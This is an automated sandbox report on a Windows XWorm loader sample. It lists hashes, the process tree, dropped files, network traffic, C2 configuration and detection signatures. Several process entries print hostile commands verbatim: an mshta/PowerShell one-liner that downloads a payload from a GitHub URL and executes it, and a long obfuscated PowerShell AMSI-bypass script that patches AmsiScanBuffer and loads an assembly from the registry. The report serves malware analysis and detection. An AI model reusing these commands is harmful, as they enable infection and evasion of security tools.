File name:

loader.exe

Full analysis: https://app.any.run/tasks/02ba3989-931c-4213-a9cb-7494145a0fe0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: December 14, 2024, 09:21:22
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
remote
xworm
loader
amsi-bypass
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

0A3CAA24FAAC73876ACBDCA11B6CDA57

SHA1:

FA619ABF5C6F84598B500152A19D64EE4FBCD6D4

SHA256:

C301D8C10990B7AC7804C3ED68F9E52682722507E950E6BC83B2796F5170449A

SSDEEP:

6144:q7ZpPCYXxQhzP92Yy5ax8ZZCHd4OBCUQlP:q7Zp68Yzl2rGP9MlP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • XWORM has been detected (YARA)

      • $77loader.exe (PID: 4444)

    • XWORM has been detected (SURICATA)

      • $77loader.exe (PID: 4444)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 3808)

    • Runs injected code in another process

      • powershell.exe (PID: 3808)

    • Application was injected by another process

      • dllhost.exe (PID: 3732)

  • SUSPICIOUS

    • The process executes via Task Scheduler

      • $77loader.exe (PID: 4444)
      • powershell.exe (PID: 3808)

    • Executable content was dropped or overwritten

      • loader.exe (PID: 4996)
      • powershell.exe (PID: 3172)

    • Reads security settings of Internet Explorer

      • $77loader.exe (PID: 4444)

    • Reads the date of Windows installation

      • $77loader.exe (PID: 4444)

    • Starts CMD.EXE for commands execution

      • $77loader.exe (PID: 4444)

    • Executing commands from ".cmd" file

      • $77loader.exe (PID: 4444)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 5464)

    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 5464)

    • Uses ATTRIB.EXE to modify file attributes

      • powershell.exe (PID: 3172)

    • Contacting a server suspected of hosting an CnC

      • $77loader.exe (PID: 4444)

    • Connects to unusual port

      • $77loader.exe (PID: 4444)

    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 3808)

    • Possibly patching Antimalware Scan Interface function (YARA)

      • dllhost.exe (PID: 3732)

  • INFO

    • Reads the computer name

      • loader.exe (PID: 4996)
      • $77loader.exe (PID: 4444)
      • skibidi.exe (PID: 556)

    • Creates files in the program directory

      • loader.exe (PID: 4996)
      • powershell.exe (PID: 3172)

    • Checks supported languages

      • loader.exe (PID: 4996)
      • $77loader.exe (PID: 4444)
      • skibidi.exe (PID: 556)

    • Reads the machine GUID from the registry

      • $77loader.exe (PID: 4444)
      • skibidi.exe (PID: 556)

    • Create files in a temporary directory

      • $77loader.exe (PID: 4444)

    • The process uses the downloaded file

      • $77loader.exe (PID: 4444)
      • mshta.exe (PID: 5464)
      • powershell.exe (PID: 3172)

    • Process checks computer location settings

      • $77loader.exe (PID: 4444)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5464)

    • Checks proxy server information

      • mshta.exe (PID: 5464)
      • $77loader.exe (PID: 4444)
      • powershell.exe (PID: 3172)

    • Reads the software policy settings

      • $77loader.exe (PID: 4444)

    • Reads Environment values

      • $77loader.exe (PID: 4444)

    • Disables trace logs

      • $77loader.exe (PID: 4444)
      • powershell.exe (PID: 3172)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3172)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3172)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3172)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 3172)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(4444) $77loader.exe
C2https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Ip:<1723>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeXWorm V5.3
USB drop nameUsb.exe
MutexWDL54KcDl1HqgxLy
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:12:14 08:54:39+00:00
ImageFileCharacteristics: Executable
PEType: PE32
LinkerVersion: 8
CodeSize: 276480
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x45722
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 1.0.0.0
InternalName: loader.exe
LegalCopyright:
OriginalFileName: loader.exe
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
13
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start loader.exe #XWORM $77loader.exe cmd.exe no specs conhost.exe no specs mshta.exe no specs powershell.exe conhost.exe no specs attrib.exe no specs skibidi.exe no specs skibidi.exe powershell.exe no specs conhost.exe no specs dllhost.exe

Process information

PID
CMD
Path
Indicators
Parent process
556C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\c.cmd" "C:\Windows\System32\cmd.exe$77loader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
556"C:\ProgramData\$77Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\skibidi.exe" C:\ProgramData\$77Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\skibidi.exe
powershell.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\programdata\$77loader..{21ec2020-3aea-1069-a2dd-08002b30309d}\skibidi.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
1668"C:\ProgramData\$77Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\skibidi.exe" C:\ProgramData\$77Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\skibidi.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\programdata\$77loader..{21ec2020-3aea-1069-a2dd-08002b30309d}\skibidi.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2548\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3172"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr('https://raw.githubusercontent.com/43a1723/test22/refs/heads/main/payload')|iexC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3732C:\Windows\System32\dllhost.exe /Processid:{67a49a6a-3925-4558-8d99-0dca192d67e4}C:\Windows\System32\dllhost.exe
winlogon.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3808"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jieYGuKSnSPk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FcXipYBCiInvMJ,[Parameter(Position=1)][Type]$WBNPoDHGee)$RWFmHkAjhgi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+'c'+[Char](116)+'e'+'d'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+'o'+'r'+'y'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+'T'+'yp'+'e'+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+''+[Char](97)+'l'+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+'t'+[Char](111)+''+[Char](67)+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RWFmHkAjhgi.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$FcXipYBCiInvMJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+'e'+[Char](100)+'');$RWFmHkAjhgi.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+'Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$WBNPoDHGee,$FcXipYBCiInvMJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'na'+'g'+''+[Char](101)+'d');Write-Output $RWFmHkAjhgi.CreateType();}$yvUemwcnoBZwz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+'m'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+'oft'+'.'+''+'W'+''+[Char](105)+''+'n'+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+'N'+[Char](97)+''+'t'+''+'i'+'ve'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$bqEDCgycNOHEBs=$yvUemwcnoBZwz.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+'r'+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IDbaKIaKlDxNfWKVdwK=jieYGuKSnSPk @([String])([IntPtr]);$uzJnXbKmhpVNtznssgRXhe=jieYGuKSnSPk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qhDPxndGTIE=$yvUemwcnoBZwz.GetMethod('Get'+'M'+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+'an'+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+'.'+'dl'+'l'+'')));$iSbqJtiHvcuPrN=$bqEDCgycNOHEBs.Invoke($Null,@([Object]$qhDPxndGTIE,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$wkABxQflFggLivtos=$bqEDCgycNOHEBs.Invoke($Null,@([Object]$qhDPxndGTIE,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$TURsxqq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iSbqJtiHvcuPrN,$IDbaKIaKlDxNfWKVdwK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+'l'+'l'+'');$YVTKMvRFjscEfAOYf=$bqEDCgycNOHEBs.Invoke($Null,@([Object]$TURsxqq,[Object](''+'A'+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$vSwcayMQNF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wkABxQflFggLivtos,$uzJnXbKmhpVNtznssgRXhe).Invoke($YVTKMvRFjscEfAOYf,[uint32]8,4,[ref]$vSwcayMQNF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YVTKMvRFjscEfAOYf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wkABxQflFggLivtos,$uzJnXbKmhpVNtznssgRXhe).Invoke($YVTKMvRFjscEfAOYf,[uint32]8,0x20,[ref]$vSwcayMQNF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
4444"C:\ProgramData\$77loader.exe"C:\ProgramData\$77loader.exe
svchost.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Version:
1.0.0.0
Modules
Images
c:\programdata\$77loader.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
XWorm
(PID) Process(4444) $77loader.exe
C2https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Ip:<1723>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeXWorm V5.3
USB drop nameUsb.exe
MutexWDL54KcDl1HqgxLy
4996"C:\Users\admin\Desktop\loader.exe" C:\Users\admin\Desktop\loader.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\loader.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5464mshta vbscript:createobject("wscript.shell").run("powershell iwr('https://raw.githubusercontent.com/43a1723/test22/refs/heads/main/payload')|iex",0)(window.close)C:\Windows\System32\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
18 013
Read events
17 992
Write events
21
Delete events
0

Modification events

(PID) Process:(5464) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5464) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5464) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4444) $77loader.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\$77loader_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
2
Suspicious files
3
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
4996loader.exeC:\ProgramData\$77loader.exeexecutable
MD5:0A3CAA24FAAC73876ACBDCA11B6CDA57
SHA256:C301D8C10990B7AC7804C3ED68F9E52682722507E950E6BC83B2796F5170449A
3172powershell.exeC:\ProgramData\$77Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\skibidi.exeexecutable
MD5:A11F28D78A308270DEFB227A3927C5B5
SHA256:2C48AD9CA24D85EB94B5EBF78FCEBE9CF36F373AD0DADFC3228BE333184C8DFD
3808powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:CFBBFED8A5647BA457DD1115F529084B
SHA256:ED48AA62426EFAFB55329EEDEBAF36AAFC4DCD78B4AF94FCB873835D6D93A8B1
3172powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5zw1ynok.t1z.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3172powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kfdvz24l.a4t.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3172powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3DA3928504E4700E10125826FBD71D9E
SHA256:2289D0D93C2D1101E0ABAC2969C35D0B6FF1C06F10BDF6C729F263A47123BFC4
4444$77loader.exeC:\Users\admin\AppData\Local\Temp\c.cmdtext
MD5:527AB64BE48A2EEB866CC39ADF8D7881
SHA256:1A6AB31585C11C81A56F1202733AE149EF0DAFE9AED12FD915D0323C8C49D2C6
3808powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_glzb4aes.53r.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3808powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ceb40nao.hvj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3172powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:33DE27C8DCC88FC3DB33B429DB60C7D5
SHA256:708AE655B44F33D7DCD06BC681E15BD4D8E9C37226D62D38FF8F51FF0EB714E3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
28
DNS requests
11
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
716
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
140.82.121.3:443
https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Ip
unknown
text
21 b
unknown
GET
302
104.21.64.1:443
https://anonsharing.com/194e218797374600/Install.exe?download_token=b6b3a4a745f25b55991fca3ba3961a2649d56421b8d02347c4c611e9bbc845b5
unknown
html
2.08 Kb
unknown
GET
200
140.82.121.3:443
https://raw.githubusercontent.com/43a1723/test22/refs/heads/main/payload
unknown
text
1.08 Kb
unknown
GET
302
104.21.80.1:443
https://anonsharing.com/file/194e218797374600/Install.exe
unknown
html
774 b
unknown
GET
200
75.2.60.5:443
https://s3.ca-central-1.wasabisys.com/anonsharing/dd/dd9433c2464cd566c5237a2ff4c9595f?response-content-disposition=filename%3DInstall.exe&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20241214%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241214T092153Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=c4ca52e105d4329377a3e28ee139b0f402b05e9e86366a3c8bcbd9a1bf93a36f
unknown
executable
161 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
716
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
104.126.37.154:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.168.100.255:138
whitelisted
716
svchost.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
716
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
716
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
  • 4.231.128.59
whitelisted
www.bing.com
  • 104.126.37.154
  • 104.126.37.171
  • 104.126.37.123
  • 104.126.37.139
  • 104.126.37.128
  • 104.126.37.130
  • 104.126.37.152
  • 104.126.37.155
  • 104.126.37.153
whitelisted
google.com
  • 172.217.18.110
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.109.133
  • 185.199.108.133
shared
anonsharing.com
  • 104.21.80.1
  • 104.21.16.1
  • 104.21.112.1
  • 104.21.32.1
  • 104.21.96.1
  • 104.21.48.1
  • 104.21.64.1
unknown
s3.ca-central-1.wasabisys.com
  • 38.143.146.103
  • 38.143.146.100
  • 38.143.146.102
  • 38.143.146.101
whitelisted
self.events.data.microsoft.com
  • 13.89.179.8
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
4444
$77loader.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
2192
svchost.exe
Misc activity
ET INFO Commonly Abused File Sharing Domain (wasabisys .com) in DNS Lookup
3172
powershell.exe
Misc activity
ET INFO Commonly Abused File Sharing Domain (wasabisys .com) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
loader.exe